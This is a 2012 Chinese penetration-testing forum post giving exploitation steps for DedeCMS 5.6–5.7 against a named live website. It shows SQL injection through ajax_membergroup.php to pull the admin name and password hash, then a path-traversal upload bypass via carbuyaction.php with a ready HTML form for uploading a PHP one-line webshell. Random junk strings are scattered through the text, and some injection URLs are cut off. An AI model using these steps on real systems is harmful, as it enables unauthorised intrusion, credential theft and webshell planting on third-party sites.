中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
( q# M2 U1 P1 E& i: I
这站
http://www.political-security.com/
9 q+ r5 w, I( U8 h) h _+ h
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
8 w6 f) m# t! A! [5 ~9 ~% V" w
www.political-security.com/data/mysql_error_trace.inc
爆后台
& T% h8 f& b/ G3 `) b
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
) M# d6 g! Y) I% Q5 _
然后写上语句
; l7 A1 W7 ^7 }3 i# L1 Y
查看管理员帐号
! l1 P2 q8 [- O) s
http://www.political-security.co ... &membergroup=@`
7 }! m; U) c6 Z( k
@( `% s/ x1 V
admin
- Z# N D" M/ u# m5 z
+ \0 t( X) z" {3 _* m
查看管理员密码
0 K1 f3 q p( i3 K. L; H4 a
http://www.political-security.co ... &membergroup=@`
, U s, U! a' k2 C1 A
6 _7 A$ {/ _$ Q7 ^0 Z1 [; M
8d29b1ef9f8c5a5af429
2 H+ g G+ T9 A% O/ J* B1 a
$ H+ n+ t* q, `$ r! {9 p0 b
查看管理员密码
( u; V1 ~# n0 y, l
. e. r& w7 x7 w- c, c
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
# [, R& b2 t7 a/ o
& c% |5 u' I5 ?9 `( W# S
8d2
+ N5 f) c% K. A- W2 f2 s
9b1ef9f8c5a5af42
" F6 y. t0 |+ ^8 s6 a( D
9
, a$ b% ~1 O& j8 L/ k
# B/ R6 o, E9 n/ }% _, D
cmd5没解出来 只好测试第二个方法
1 @/ j" C) j$ P
9 Y5 h% M4 X& r% x
6 F3 \: `" b5 w
②上传漏洞:
t) A8 w; D X% R9 z
% M+ ^% Z& w/ Y- N8 ~" f: T K
只要登陆会员中心,然后访问页面链接
; ^9 s- X! U: c9 s
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
% q `6 C$ O9 n2 u. E% s! c
# _9 C p& l+ A/ X, @8 j5 P$ [9 O
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
) [' q0 E5 z4 L. W; h# r0 B
- p0 z: F( Y/ ~; v# W5 @% t- ~
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
6 }0 Y6 B: D; P) N
5 v. F( a5 }* `" O
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
* K9 r3 n- K; e* A7 S$ \7 I
或者
- t& v* v: a- ]& R8 B' j$ L
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2